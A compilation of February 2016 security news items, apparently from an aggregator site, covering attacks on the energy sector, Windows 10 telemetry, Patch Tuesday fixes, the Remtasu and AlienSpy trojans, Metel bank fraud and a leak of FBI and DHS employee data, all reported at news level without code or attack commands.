A study conducted by TripWire in January revealed successful cyber attacks on the energy industry increased as never before in 2015.
Data published in the report confirmed that 69% of respondents to the Tripwire study declared they “weren’t confident” their company would be able to detect every cyber attack.
According to US Department of Homeland Security in 2014 the companies in the energy industries suffered 245 incidents.
The flaw fixed by SAP in the in SAP xMII is a directory traversal vulnerability, hackers could exploit it to penetrate into plant floor and OT networks and launch the attack against the connected ICS and SCADA systems.
The flaw could allow attackers to access the file system of the SAP server with unpredictable consequences.
“Any vulnerability affecting SAP MII can be used as a starting point of multi-stage attacks aiming to get control over plant devices and manufacturing systems,” said Polyakov Alexander, CTO at SAP and Oracle security specialists ERPScan, told El Reg. “Similar attack scenarios were presented by us at the BlackHat conference but for the oil and gas [industry] in particular.”
Windows 10 Sends Your Data 5500 Times Every Day Even After Tweaking Privacy Settings
10.2.2016 Security
Myth: By disabling all privacy compromising and telemetry features on Windows 10 will stop Microsoft to track your activities.
Fact: Even after all telemetry features disabled, Windows 10 is phoning home more than you could ever think of.1
Ever since the launch of Microsoft's newest operating system, Windows 10 is believed to be spying on its users. I wrote a number of articles to raise concern about Windows 10 privacy issues, including its controversial data mining features and privacy invasion features.
The only solution believed to cope up with these issues is to disable all the telemetry features or use an automated tool to disable all privacy-infringing features in just one click.
But unfortunately, all these efforts got wasted because Microsoft still tracks you, even after you tighten your Windows 10 privacy to an extreme level, claims the recent analysis conducted by a Voat user CheesusCrust.
Traffic Analysis Reveals Extent of Windows 10 Spying
Curious to know the extent of Windows 10 spying, CheesusCrust set up his Linux laptop with a Windows 10 Enterprise virtual machine as well as a DD-WRT router that was being utilized to monitor traffic.
CheesusCrust also disabled every single tracking and telemetry features in the operating system. He then left the machine running Windows 10 overnight in an effort to monitor the connections the OS is attempting to make.
The results are not so surprising:
Eight hours later, he found that the idle Windows 10 box had tried over 5,500 connections to 93 different IP addresses, out of which almost 4,000 were made to 51 different IP addresses belonging to Microsoft.
After leaving the machine for 30 hours, Windows 10 expanded that connection to 113 non-private IP addresses, potentially allowing hackers to intercept this data.
DisableWinTracking
Taking his test to a step further, CheesusCrust again installed Windows 10 Enterprise virtual machine on his laptop, disabled all tracking features and enabled a third-party tool known as DisableWinTracking.
After this, the number was reduced to 2758 connections to 30 different IP addresses in the period of 30 hours.
The interesting fact here is: This analysis was conducted on Windows 10 Enterprise Edition that comes with the most granular level of user control, far more than the standard Windows 10 Home Edition used by a sizable audience.
The Greatest Cost to Owning 'Free' Windows 10
However, based on these logs, it would be inaccurate to say that Windows 10 is sending your personal data to Microsoft's servers. But, thousands of connection attempts in the period of 8 hours just to check for updates or adjust the time, sounds more complicated than thought.
A September 2015 blog from Terry Myerson, head of the Windows team, explained that while Windows 10 does send some of your data to the company, everything is encrypted and doesn't include any of your personal details.1
Here's what Microsoft says about the Windows 10 Spying concerns:
"We collect a limited amount of information to help us provide a secure and reliable experience. This includes data like an anonymous device ID, device type, and application crash data which Microsoft and our developer partners use to continuously improve application reliability. This doesn't include any of your content or files, and we take several steps to avoid collecting any information that directly identifies you, such as your name, email address or account ID."
While this research doesn't provide what details Windows 10 is sending to the company even after disabling the telemetry features, you have to keep this in mind that Nothing comes for FREE. "Free" is just a relative term. May be you are paying the greatest cost to owning Windows 10.
Bye bye, Flash! Google to Ban Flash-based Advertising
10.2.2016 Apple
Google to Ban Adobe Flash-based Advertising
Google had also joined the path of Apple, Facebook, and Youtube to kill the "Adobe Flash Player" by announcing that the company is banning Flash banner support from its Adwords Advertising platform.
"To enhance the browsing experience for more people on more devices, the Google Display Network and DoubleClick Digital Marketing are now going 100% HTML5" Google says.
It's been two decades since Adobe Flash has ruled the Web Space Animation Arena, which was the de facto standard for playing the online videos.
Flash Player had been famous for Zero-day exploits which are a potential threat to online users.
Even Adobe tried to maintain equilibrium by releasing a countless number of patches frequently (that got hiked), for instant reported vulnerabilities, but this had annoyed both customers and companies.
The endless troubleshooting of the Flash Player plugins never resolved the vulnerabilities.
To put a full stop on this issue... many major tech companies like Apple, Facebook, Youtube, Google Chrome, Firefox had been magnetized towards the new substitutor - HTML 5.
Facebook's Security Chief publicly called for Adobe to announce a 'kill-date for Flash.'
Google Chrome has also begun blocking auto-playing Flash ads by default.
In January this year, YouTube moved away from Flash for delivering videos.
Firefox also blocked the Flash plugin entirely.
By ending up Flash, all the above companies found a silver bullet to the security issues that have plagued Adobe Flash for years, as well as eliminated a third party dependency.
Steve Jobs was right about the end of Flash as he quoted as saying in his letter:
“New open standards created in the mobile era, such as HTML5, will win on mobile devices (and PCs too). Perhaps Adobe should focus more on creating great HTML5 tools for the future, and less on criticizing Apple for leaving the past behind.”
HTML 5 has gained a Word of Mouth Popularity by many developers and also have many advantages like to play the video smoothly, in fact, in a better way.
So, Google also officially declared that it would not support Flash ads in Doubleclick Digital Marketing from July 30, 2016.
Moreover, from January 2, 2017, the company will discontinue the support for Google Display Network as a part of complete Flash Wipe Out.
However, as a Result of this awful reputation, Flash Player would be rebranded as “Animate CC” with some additional features like the direct conversion of Flash Files to HTML5 Canvas files.
Adobe Animate CC – mostly looks like an update to the Flash Professional software – supports Adobe Flash (SWF) and AIR formats 'as first-class citizens,' along with other animation and video formats, including HTML5 canvas, 4K and WebGL output.
Crooks are offering Apple employees up to $23,000 for their login credentials
10.2.2016 Apple
According to former Apple employees interviewed by the Business Insider, cyber criminals are offering Apple staffers in Ireland up to $23,000 for their login details.
Insiders are one of the greatest security problems for any organizations, working from the inside they can operate under the radar for a log time stealing information and sabotaging processes and infrastructures.
Modern organizations are often helpless while facing with insiders that are threatening their information assets and intellectual property.
One of the most clamorous cases of insiders was related to the Yandex Search Engine, in December a former employee stole the source code of the Russian Search Engine and tried to sell it and its algorithms for just $29,000 on the black market.
Corrupting an insider is the most easy way to breach an organization, news of the day the attempt to breach with a similar technique the Apple’s European Headquarters in Cork, Ireland.
Apple employees at Operations International in Cork, Ireland
Crooks are offering to the Apple employees 20,000 Euro ($23,000 USD) in exchange of Corporate Login Details of Irish Apple Employees in exchange of 20,000 Euro ($23,000 USD).
Obtaining the Apple employee’s corporate login credentials, attackers could breach the system and move lateraly inside the company network exfiltrating precious information from the company’s archives.
“Hackers are offering Apple employees thousands of euros for their company login details, according to someone that works for the company in Ireland. The employee, who spoke to Business Insider on the condition we kept their anonymity, said there are a lot of people trying to get hold of Apple’s inside information.” reported the Business Insider.
“You’d be surprised how many people get on to us, just random Apple employees,” the Apple employee told to Business Insider. “You get emails offering you thousands [of euros] to get a password to get access to Apple.”
“I could sell my Apple ID login information online for €20,000 ($23,000) tomorrow. That’s how much people are trying” said another employee.
Apple is not underestimating the case, according to the company there are no illicit activities linked to the proposals received by its emaployess, anyway the risk of insiders is high.
As usual, the attackers have a deep knowledge of the victim, another former Apple employee confirmed to Business Insider that crooks contact specific figures inside the organization. Hackers use to apporach Apple staff and offer them money in exchange for login details or company information.
“They look for someone who has jumped diagonally into a junior managerial position, so not a lifer working their way up, and not a lifer who has been there a long time,” said the former Apple employee.
The circumstance suggests the importance of the human factor inside any organization, employees represents the weakest link in the security chain. Disgruntled employees or a staffer not trained to face attacks from outside could become a backdoor even in a armored organization.
Vigilante Hackers Aim to Hijack 200,000 Routers to Make Them More Secure
10.2.2016 Hacking
Vigilante Hackers Aim to Hijack 200,000 Routers to Make Them More Secure
The same "Vigilante-style Hacker," who previously hacked more than 10,000 routers to make them more secure, has once again made headlines by compromising more than 70,000 home routers and apparently forcing their owners to make them secure against flaws and weak passwords.
Just like the infamous hacking group Lizard Squad, the group of white hat hackers, dubbed the White Team, is building up a sizeable botnet consisting of hundreds of thousands of home routers, but for a good purpose.
Lizard Squad, the same group responsible for Sony PlayStation Network and Microsoft Xbox Live outages, uses their botnets to launch DDoS (Distributed Denial of Service) attacks against target websites to flood them with traffic and knock them offline.
Hacking Routers to Make them More Secure
Challenged by Lizard Squad's maliocus work, the White Team of vigilante hackers built their own peer-to-peer botnet that infects routers to close off vulnerabilities, such as:
Weak default passwords
DNS poisoning
Unauthorised access (backdoor)
Disabled firewalls
Their malware, dubbed "Linux.Wifatch" a.k.a "Wifatch" that has been used by the team since last year continues to be updated and has been open-sourced on Github.
The malware, first discovered in November 2014 by an independent malware researcher "Loot Myself" and analysed by Symantec last year, now includes more programs to remove other malicious software and backdoors already on the system.
The White Team has access to around 70,000 devices, according to Symantec, who is continuously watching over the team's botnet.
Good Malware to Fight Bad Malware
Lizard Squad sizable botnet contained somewhere between 120,000 and 150,000 bots, a Lizard spokesperson told Forbes, claiming that their botnet includes not just home routers and PCs, but smart refrigerators, smart TVs and other smart home devices as well.
The White Team aims at hacking and protecting between 150,000 and 200,000 devices from Lizard Squad attacks, thereby removing the rogue gang from people's homes.
However, the team of vigilante hackers face some hurdles, especially when working with the Wifatch malware, which is often too big to install on smaller routers.
"The goal is to use (most) of the 60,000 nodes we have to connect to the hundreds of thousands of boxes that are too small for our normal disinfector and disinfect them remotely," the hacker collective told the publication over encrypted email.
Since there are so many vulnerable devices that can be hacked with little or no effort, these vigilante hackers aren't answer to this widespread problem. They can only help minimize the issue.
The White Team is not the only team of vigilante hackers trying to secure the Internet. Just last week, a hacker replaced a malware with antivirus software. An anonymous hacker was found replacing Dridex, the most active banking malware, with the copies of Avira security software.
Hackers Are Offering Apple Employees $23,000 for Corporate Login Details
10.2.2016 Apple
An unsatisfied Employee may turn into a Nightmare for you and your organization.1
Nowadays, installing an antivirus or any other anti-malware programs would be inadequate to beef up the security to maintain the Corporate Database.
What would you do if your employee itself backstabbed you by breaching the Hypersensitive Corporate Secrets?
Yes! There could be a possibility for an Internal Breach all the time.
Just last year, an ex-employee stole Yandex Search Engine Source Code and tried to sell it for just $29,000 in the underground market.
Over a few years, hackers have adopted various techniques ranging from Stress Attacks to Social Engineering tactics in order to gain the Classified Corporate information.
Hackers Offering $23,000 for Internal Access
Now hackers are rolling their dice for the next Deceptive Step to acquire Corporate Login Details of Irish Apple Employees in exchange of 20,000 Euro ($23,000 USD).
The current situation is being faced by the employees of Apple's European Headquarters in Cork, Ireland.
The offer had been made by the unknown hackers and criminals to the random Apple employees in their mailbox demanding the employee's Apple Login passwords in return of 20,000 Euros.
"You'd be surprised how many people get on to us, just random Apple employees," the anonymous employee said. "You get emails offering you thousands [of euros] to get a password to get access to Apple" stated.
"I could sell my Apple ID login information online for €20,000 ($23,000) tomorrow. That’s how much people are trying" another employee quoted.
This new proposal had been made to the non-lifers of the company who would not spend there. Thus, widening a fluky entry to the database.
By gaining the access to Apple Employee’s Login credentials, hackers could find the jewel in their pocket for their malicious activity from which they could amass the financial profit.
Apple is considering this scam very seriously and till now, no employees had compromised his/her Login Credentials for illicit gain.
Internal Breach
One of the domestic threat to your organization is the INSIDER. According to a survey conducted by SANS last year, it is found that 71% of respondents are feared about the Insider Attack.
The consequence of the threat may even result in the liquidation of your company.
The Department of Homeland Security (DHS) and FBI also had a pressed up the issue by underlining that majority of the threats are the outcomes of an Insider.
Lack of Technical Training to the employees, Lack of Budget and inappropriate policies broaden the chances of a breach.
Hiring a Security Firm, Proper Training to all the Employees about latest threats, Shutting down of an employee Account soon after his/her Termination, Frequent changes applied in the Password, Limited Allowance of employees to sensitive docs, etc. would cover such vulnerabilities.
Now, before purchasing the high-end firewalls or Virus Destructors, just turn around and look…
...Who’s at your back!
February 2016 Patch Tuesday – All Windows are affected by a critical flaw
10.2.2016 Vulnerebility
Microsoft February 2016 Patch Tuesday updates include a total of 13 bulletins that resolve a total of 41 security flaws in Windows, one of them affects all supported versions.
All supported versions of Windows are affected by a critical vulnerability recently fixed by Microsoft. The IT giant has released 13 security bulletins, six issues are rated as critical. The security bulletins resolve a total of 41 security flaws in Microsoft software.
One of the bulletins in the February 2016 Patch Tuesday, the MS16-022, fixes the 22 Flash Player flaws recently resolved by Adobe, including the Flash libraries used in Microsoft Internet Explorer 10 and 11, and Edge browsers.
A vulnerability in the Microsoft Windows 10 operating system, as well as Windows Server 2016 Tech Preview 4, has captured the attention of the security community.
The MS16-013 vulnerability is a memory-corruption flaw and could be exploited by remote attackers to execute arbitrary code as the logged-in user by tricking a user into opening a specially crafted Journal file. Fortunately, according to Microsoft the vulnerability has not been exploited in the wild.
This vulnerability would allow attackers to run malicious programs on a targeted machine and create new accounts with full user rights.
“The vulnerability could allow remote code execution if a user opens a specially crafted Journal file. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.” states the official description published by Microsoft.
The list of February 2016 Patch Tuesday bulletins includes also the MS16-015, which fixes critical vulnerabilities in Microsoft Office security that can be exploited to execute arbitrary code in the context of the targeted user simply tricking victims into opening a specially crafted.
The complete list of fixes is reported below:
MS16-009: A cumulative security update for Internet Explorer 9 through 11. The update patches 13 security issues, including remote-code-execution (RCE) and information disclosure bugs.
MS16-011: Another cumulative update for the Microsoft’s newest Edge browser in Windows 10 patches 6 security issues, 4 of which are remote code execution vulnerabilities.
MS16-012: An update addresses two remote-code-execution flaws in Windows PDF Library and Reader for Windows 8.1, Windows 10 and Server 2012. Flaws could allow attackers to run malicious code on an affected system by tricking users into opening a specially-crafted PDF file.
MS16-015: An update patches 6 memory-corruption vulnerabilities in Microsoft Office, each of which could allow a remote attacker to run arbitrary code by tricking a user intoopening a specially-crafted Office file.
MS16-022: A security update resolves more than two dozen vulnerabilities in Adobe Flash Player on all supported versions of Windows 8.1, Windows 10, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1.
Microsoft also launched a page for public tracking of Windows 10 update (Windows 10 update history) an effort to show users the improvement applied by the company to its OS.
“We’re committed to our customers and strive to incorporate their feedback, both in how we deliver Windows as a service and the info we provide about Windows 10,” states Microsoft .
“In response to this feedback, we are providing more details about the Windows 10 updates we deliver through Windows Update. You’ll see a summary of important product developments included in each update, with links to more details.”
All Versions of Windows affected by Critical Security Vulnerability
10.2.2016 Vulnerebility
Microsoft has released 13 security bulletins, six of which are considered to be critical, resolving a total of 41 security vulnerabilities in its software this month.
Every Windows version Affected:
One of the critical vulnerabilities affects all supported version of Windows, including Microsoft's newest Windows 10 operating system, as well as Windows Server 2016 Tech Preview 4.
The memory-corruption flaw (MS16-013) could allow a remote attacker to execute arbitrary code as the logged-in user by tricking a user into opening a specially crafted Journal file.
This vulnerability would let the attacker run malicious programs on victim's machine, even delete data and create new accounts with full user rights.
Administrator accounts are at the greatest risk than users with a fewer user rights account on the system. However, the good news is the vulnerability has not been spotted in the wild.
List of All Critical Vulnerabilities
Other Critical Security Updates are as listed below:
MS16-009: A cumulative security update for Internet Explorer 9 through 11. The update patches 13 security issues, including remote-code-execution (RCE) and information disclosure bugs.1
MS16-011: Another cumulative update for the Microsoft's newest Edge browser in Windows 10 patches 6 security issues, 4 of which are remote code execution vulnerabilities.
MS16-012: An update addresses two remote-code-execution flaws in Windows PDF Library and Reader for Windows 8.1, Windows 10 and Server 2012. Flaws could allow attackers to run malicious code on an affected system by tricking users into opening a specially-crafted PDF file.
MS16-015: An update patches 6 memory-corruption vulnerabilities in Microsoft Office, each of which could allow a remote attacker to run arbitrary code by tricking a user into opening a specially-crafted Office file.
MS16-022: A security update resolves more than two dozen vulnerabilities in Adobe Flash Player on all supported versions of Windows 8.1, Windows 10, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1.
All of the above critical vulnerabilities were privately reported to the tech giant and were not believed to have been exploited by attackers.
Other security updates rated as "important" issues address Remote Code Execution flaw and Elevation of Privilege bug in Windows, as well as Denial of Service (DoS) vulnerability in Microsoft Windows, .NET Framework and Active Directory Federation Services (ADFS).
Windows 10 Update History Page Goes Live Today
Meanwhile, Microsoft also launched a dedicated page for keeping track of every Windows 10 update in order to improve transparency.
So from today, you can just visit Windows 10 update history to see the latest improvements, features, and changes the company has made to its latest OS.
"We're committed to our customers and strive to incorporate their feedback, both in how we deliver Windows as a service and the info we provide about Windows 10," the company notes.
"In response to this feedback, we are providing more details about the Windows 10 updates we deliver through Windows Update. You'll see a summary of important product developments included in each update, with links to more details."
Windows 10 update history page will regularly be updated, as soon as the company rolls out new updates and security patches to the operating system.
Are you searching for a Facebook Hacking Tool? Be careful!
10.2.2016 Hacking
Security Experts at ESET security firm discovered a new variant of a known trojan disguised as a Facebook Hacking Tool.
Security researchers at ESET have published an interesting post about a new Facebook hacking tool. I receive every week dozen emails requesting me instruction to hack Facebook accounts.
The hacking tool recently discovered is not able to support you in this hard task, instead it could expose users that download it to serious risks.
But Beware of any software that promises you to hack any Facebook account, it could be very dangerous to launch it.
The tool reported by THN is dubbed Remtasu, it is available online as a Facebook hacking tool, but in reality, it is a trojan that could infect Windows systems.
The trojan is a well-known threat that is circulating for a long on the Internet, now crooks have found a differed way to spread it.
Cyber criminals are disguising it as a software to take over any Facebook account and steal Facebook credentials.
The tool contains a Keylogger module that could be used to that can steal users login credentials. Typically a user searching for a Facebook hacking tool finds the malicious application on direct download websites.
Once a user visits one of these websites, the dangerous Win32/Remtasu.Y malware automatically gets downloaded and executed on victim’s machine.”Although these files are from the same family as those witnessed last year, the way they are being spread is different. We are no longer seeing propagation through e-mail. They are instead coming from direct download sites. Once a user downloads and executes the file, their data is compromised.” states a blog post published by ESET.
The Remtasu trojan is able to capture keystrokes and access information from the clipboard, every information collected on the infected system is stored locally in a data file and then sent to an FTP server.
The system gain persistence in the infected system by saving its copy in a folder that it also creates within the system32 folder.
“As is to be expected in this type of threat, the virus always seeks a way to remain on the computer even when the victim reboots their system or attempts to find the threat in the list of active processes.” continues the post.
“In this case, the malware replicates itself, saving the copy in a folder that it also creates within the system32 folder. The new InstallDir folder remains hidden inside the system files, making it difficult for users to access.”
The campaign based on the fake Facebook Hacking Tool mainly infected users from Colombia, Turkey, and Thailand.
Russian Metel group manipulated ruble-dollar exchange rate with malware
10.2.2016 Virus
A Russian group of cyber criminals known as METEL has hacked the systems at the Kazan-based Energobank and manipulate Ruble-Dollar Exchange Rate infecting them with a malware.
A Russian cyber gang has hacked the systems at the Kazan-based Energobank and manipulate Ruble-Dollar Exchange Rate infecting them with a malware.
The event occurred exactly one year ago, in Feb 2015, when the hacking group dubbed METEL breached into the Russian Regional Bank for just 14 minutes resulting in the fluctuation of the exchange between 55 and 66 rubles per dollar.
The Moscow Exchange denied that its systems have been hacked, it also highlighted that its investigation has found no evidence of the currency market manipulation. The Moscow Exchange explained that fluctuations observed by the users could have been caused by traders’ mistakes.
The security firm Group-IB that was involved in the investigation on the case discovered that the Metel Hacking group infected Kazan-based Energobank, the hackers used the Corkow Trojan and placed more than $500 million in orders at non-market rates.
Corkow is a backdoor that breached 250,000 computers worldwide in more than 100 financial institutions.
“This is the first documented attack using this virus and it has potential to do much more damage,” Dmitry Volkov, the head of Group-IB’s cyber intelligence department, told Bloomberg. “Once the malware has penetrated a local network, it is sophisticated enough to infect computers that are even not connected to the Internet.”” Dmitry Volkov, the head of Group-IB’s cyber intelligence department, told Bloomberg.
The threat actors used spear phishing messages containing malicious links to hack the victim’s accounts. The economic impact of the attack has been estimated in 244 Million Rubles, nearly $3.2 million.
The Metel group is the same referred in the report recently published by the Kaspersky Lab on the Carbanak 2.0.
According to Kaspersky, the group targeted a Russian bank with the malware known as Metel (aka Corkow) and compromise banks’ networks via spear-phishing emails.
The financial institution targeted by the group discovered that hackers stole millions of rubles in just one night from the ATMs of other financial institutions. The hackers used ATM balance rollbacks to steal money while balances remained untouched.
“In summer 2015, a bank in Russia discovered it had lost millions of rubles in a single night through a series of strange financial transactions. The bank’s clients were making withdrawals from ATMs belonging to other banks and were able to cash out huge sums of money while their balances remained untouched. The victim bank didn’t realize this until it tried to recoup the money withdrawn from the other banks’ ATMs.” states a blog post published by Kaspersky.
“The malware, used exclusively by the Metel group, infected the bank’s corporate network via e-mail and moved laterally to gain access to the computers within the bank’s IT systems. Having gained access to the bank operator’s money-processing system, the gang pulled off a clever trick by automating the rollback of ATM transactions. This meant that money could be stolen from ATM machines via debit cards while the balance on the cards remained the same, allowing for multiple transactions at different ATM machines.”
According to Kaspersky, the Metel group is still active and targeted at least 30 Russian financial organizations.
Group-IB confirmed it, and added that the group is only known to be active in Russia where affected 73% Russian Banks.
Rent the infamous AlienSpy backdoor is now quite easy
9.2.2016 Virus
Security experts at Kaspersky have spotted in the wild a new variant of AlienSpy RAT Family openly offered with a model of malware-as-a-service.
Today we will speak about a case of malware-as-a-service, in the specific case the threat is a remote access trojan, aka RAT, that could be used to gain control over multiple platforms, including Windows, Linux, Mac OS X, and Android.
The RAT belongs to a family of Java malware that exists since 2013 and that recently is offered for sale as a “commercial” backdoor-as-a-service. It is known as AlienSpy or Adawind, and security experts spotted it in an attack on an employee of a Singapore bank.
In April 2015, experts at Fidelis discovered that variants of the AlienSpy remote access trojan (RAT) were used in global phishing campaigns to deliver the popular Citadel banking Trojan and maintain the persistence inside the targeted architecture with a backdoor mechanism.
AlienSpy implements the typical features of other RATs plus further features, including the ability to capture webcam sessions, to steal browser credentials, to use the victim’s microphone to record environment conversations, to access files and to provide a remote desktop control.
AlienSpy uses plugins to implement the above capabilities and experts have dozens of different plugins.
AlienSpy botnet was destroyed in 2015 when the experts identified the command and control infrastructure and neutralized it.
Security experts at Kaspersky have spotted a new variant of the malware that has been modified and offered as a service in the criminal underground. Researchers at Kaspersky observed more than 150 attack campaigns relying on the new variant of AlienSpy, bad actors in the wild targeted more than 60,000 individuals.
[it] is open for service again to customers ranging from Nigerian scam operators to possible nation-state actors. Ars has confirmed that the service is offered openly through a website on the public Internet.” states Ars.
The analysis of subscribers to the malware-as-a-service revealed that the majority of clients come from the US, Canada, Russia, and Turkey.
The new variant of AlienSpy is dubbed JSocket and jRat and is available for rent on the Internet at prices ranging from $30 for one month to $200 for an unlimited version.
According to the researcher Vitaly Kamluk who analyzed the threat, the operator behind the service‘s author is a native Spanish speaker, likely Mexican.
The new variant of AlienSpy, aka JSocket and jRat, is widely adopted in scam scheme, particularly the Nigerian e-mail-based scam campaigns targeting bank customers.
Russian Hackers Manipulate Ruble-Dollar Exchange Rate with Malware
9.2.2016 Virus
Russian Hackers Manipulated Ruble—Dollar Exchange Rate with Malware
Russian Group of Hackers reportedly cracked into the Kazan-based Energobank and messed up with the Ruble-Dollar exchange rates.
In Feb 2015, a hacking group, known by the name METEL, successfully breached into the Russian Regional Bank for just 14 minutes and caused the exchange rate to fluctuate between 55 and 66 rubles per dollar, which finally resulted in the increment of Ruble’s value.
Here's how they did it:
According to Russian security firm, Group-IB, who investigated the incident, the Metel Hacking group infected Kazan-based Energobank with a virus known as the Corkow Trojan and placed more than $500 million in orders at non-market rates.
“This is the first documented attack using this virus, and it has the potential to do much more damage,” Dmitry Volkov, the head of Group-IB’s cyber intelligence department, told Bloomberg.
The hackers had taken the advantage of Spear Phishing Technique, which appears to come from a legit source. A single click on the link in the malicious mail took over the access to the system followed by ultimate exploitation.
After gaining the access to a local system, the trojan was able to cause a havoc deepening the attack to its Intranet. This way, the malware named Corkow found the isolated system which handles the money transaction exclusively to the outer world.
Corkow malware, initially discovered in 2011, regularly updates itself to evade detection by antivirus programs, and has infiltrated more than 250,000 computers worldwide and infected at least 100 financial institutions.
Bank lost 244 Million Rubles ($3.2 million)
The Energobank claimed losses of 244 million rubles ($3.2 million) due to the trades.
But, the Moscow Exchange had denied the allegations of any hacking attempt by the fact that; the changes in the Stock Market would be an output of Trader’s mistakes. They also not found any hint of currency manipulation.
The attack was earlier ported to target ATMs of Russia, affecting Russian bank card system that resulted in hundreds of millions of rubles being stolen via ATMs in August. Another attack with the same malware also facilitated hackers to use credit card limitlessly.
Metel is only known to be active in Russia (affected 73% Russian Banks), although it may present a threat to financial institutions across the globe.
Authority has not yet handcuffed any of its criminals who are raising a global bank threat.
Apple Could Offer iMessage App for Android
9.2.2016 Android
Although Apple has its own operating system for both desktop (Mac OS X) and iPhone (iOS), the com pany has always tried to port its in-house applications to other OS platforms.
Apple debuted on its rival mobile OS platform last year with the launch of Apple Music on Android. However, iTunes and Safari has already been made available for both Windows as well as Mac.
Now, the company will soon move more of its mobile applications to Android if comments made by Chief Executive Tim Cook at the recent company-wide event for Apple employees are to be believed.
iMessage App for Android Platform
Cook reportedly told his staff that sooner Apple may bring other apps and exclusive services to the Android Systems, and added that bringing Apple Music to Android in November was "a way of testing the waters for growing its services division through other platforms," reports 9to5Mac.
So, you could see iMessage, the company's encrypted messaging application, expanded to Android.
iMessage is one of the most famous Apple's apps that allows Apple users to send and receive messages, photos, and videos to their fellow Apple users as long as the device has a data connection.
How Apple Can Read End-to-End Encrypted iMessages
What many of us know is iMessage uses end-to-end encryption that even Apple or anyone else can not access or read your messages, but what we don’t know is backed up messages to Apple's iCloud service are vulnerable to federal warrants.
With iCloud Backup enabled, the copies of all your messages, photographs and every important data stored on your iPhone or iPad are encrypted on iCloud using a key controlled by Apple, and not you.
This would allow Apple and hence, anyone who breaks into your account, to read your messages and see your personal and confidential data.
List of Apple Apps you Might See on Android
Besides iMessages, the list of Apple apps that you could see expanded to Android may include iTunes, Music Memos, Apple Maps, and iCloud.
In September, the company released its first-ever Android application, known as Move to iOS, designed to help Android users transfer their content quickly and safely from an Android device to an iOS device.
Although it is yet unclear when Apple will make the move, if this happens anytime soon, Which one of your favorite Apple apps you want to see on your Android devices?
Let me know in the comments below.
How to Crack GCHQ Crypto Puzzle? — Here's the Solution
9.2.2016 BigBrothers
GCHQ has finally released the solution to their head spinning Xmas Puzzle, after all, the participants failed to reach the final answer.
GCHQ had released a crypto puzzle, dubbed Xmas Puzzle, on 9th December in the form of a Christmas Card that went viral online soon after its release.
Nearly 600,000 people shot a "Go" for the challenge since early December, but only 30,000 had made it reach the final stage.
The puzzle got popped up with a grid-shading Nonogram that resulted in the formation of a QR Code containing a hint to unlock the next level challenges.
Xmas Puzzle prolonged to various topics like Web Link Maze, Word & Numeric Puzzle, Graph Theory and other Cipher Dilemmas. Some of the questions also intrigued on entertaining topics like Lord of the Rings, Ducks, Chess, French, and Semaphores.
Who Created Crypto ‘Xmas Puzzle’?
This brainstorming puzzle was created by a small team of GCHQ Cryptographers under the GCHQ director Robert Hannigan. The given deadline to the puzzle resolvers was January 31st.
Several improvements to resolve this puzzle had created a buzz over various online forums like Reddit, which was a healthy approach to such puzzles to get solved jointly.
Xmas Puzzle helped to broaden the crypto levels of each and bolster to improve their capabilities for the problem-solving methodologies.
David MacBryan, 41, from Edinburgh, Wim Hulpia, 40, from Lovendegem in Belgium and US-born Kelley Kirklin, 54, from London, came closest to the fiendish puzzle game.
These three participants have been considered winners by the GCHQ and will be rewarded with a GCHQ Paperweight and a copy of Bletchley Park codebreaker Alan Turing's biography, signed with a personal message from GCHQ Director.
Unable to Crack? Here’s the Solution
gchq-crypto-quiz
However, GCHQ announced that any of the participants did not completely solve Xmas Puzzle. Hence, it released the full answer to it.
"I thought I had solved it, but a news report came out a few days ago saying nobody had … so I went back and had another look and figured out what I missed, but I was too late at that point. But it seems that everyone else missed it as well, and I was joint closest," David MacBryan told the Guardian.
GCHQ said the Xmas puzzle was not a recruitment ploy, which was initially believed, but the agency said the winners were welcome to apply for jobs.
The solution to the puzzle, including explanations from the puzzle-setters, is now available for you, so you can now check how many you managed to work out.
Here's the Facebook Hacking Tool that Can Really Hack Accounts, But...
9.2.2016 Social Site
Yes, you heard me right.
A newly discovered Facebook hacking tool actually has the capability to hack Facebook account, but YOURS, and not the one you desires to hack.
How to Hack Facebook account? How to Hack my Girlfriends Facebook account? My boyfriend is cheating on me, How do I hack his Facebook Account?
These are the queries that most of the Internet users search on Google.
But Beware! If you come across any Facebook hacking tool that promises you to help you hack your friends Facebook accounts, you may end up downloading a hacking tool that could hack you, instead of them.
Facebook Hacking Tool that Can Really Hack, But Your Accounts
Facebook Hacking Tool
Dubbed Remtasu, the tool is marketing itself as a Facebook hacking tool but actually is a Windows-based Trojan that has accelerated globally over the past year, and has now capability to disguise itself as an app for accessing people's Facebook account credentials.
The tool contains a Keylogger that can capture all your keystrokes and store them in a file that is subsequently sent to the attacker's server.
The malicious Facebook hacking tool is exploiting "the constant desire of a lot of users to take control of accounts from this well-known social network," according to a Monday blog post by IT security company ESET.
How Remtasu Works:
The malicious tool is delivered via direct download websites.
Once a user visits one of these websites, the dangerous Win32/Remtasu.Y malware automatically gets downloaded and executed on victim's machine and hide itself among other files.
Remtasu has capability to:
Open and obtain information from the clipboard.
Capture keystrokes.
Store all the data in a file which is subsequently sent to an FTP server.
The worst part is yet to come:
The malware remains on the infected computer even when the victim reboots their system or attempts to find the malware threat in the list of active processes.
"In this case, the malware replicates itself, saving the copy in a folder that it also creates within the system32 folder," reads the post. "The new InstallDir folder remains hidden inside the system files, making it difficult for users to access."
Most affected parts of the world include Colombia, Turkey, Thailand and elsewhere. In past, Remtasu was distributed through malicious files attached to phishing emails purporting to be from legitimate government or businesses organisations.
Hacker Leaks Info of 30,000 FBI and DHS Employees
9.2.2016 Hacking
An unknown hacker who promised to release the personal information on government employees has dump online a list of nearly 20,000 Federal Bureau of Investigation (FBI) agents and 9,000 Department of Homeland Security (DHS) officers.
Though the authenticity of the information has not been verified, at least, some of the leaked data appears to be legitimate.
Here's What the Hacker Leaked:
The hacker leaked first round of data belonging to roughly 9,000 DHS employees on Sunday, which was followed by the release of 20,000 FBI agents information on Monday.
The hacker, who goes on Twitter by the username of @DotGovs, published the supposed data on an encrypted text-sharing website, including:
Names
Job titles
Phone numbers
Email addresses
The Reason Behind the Hack
The message at the top of the data dump includes the hashtag "#FreePalestine" and reads "Long Live Palestine, Long Live Gaza: This is for Palestine, Ramallah, West Bank, Gaza, This is for the child that is searching for an answer."
The above message shows the support to Palestine, which could be the motivation behind the hack.
Although it's unclear how much of the hacked data may have been publicly available, the hacker told Motherboard that he had downloaded 200GB of data, out of 1TB total available to him.
If this comes true, the information that has been leaked so far would just be a small percentage of what the hacker has in its box.
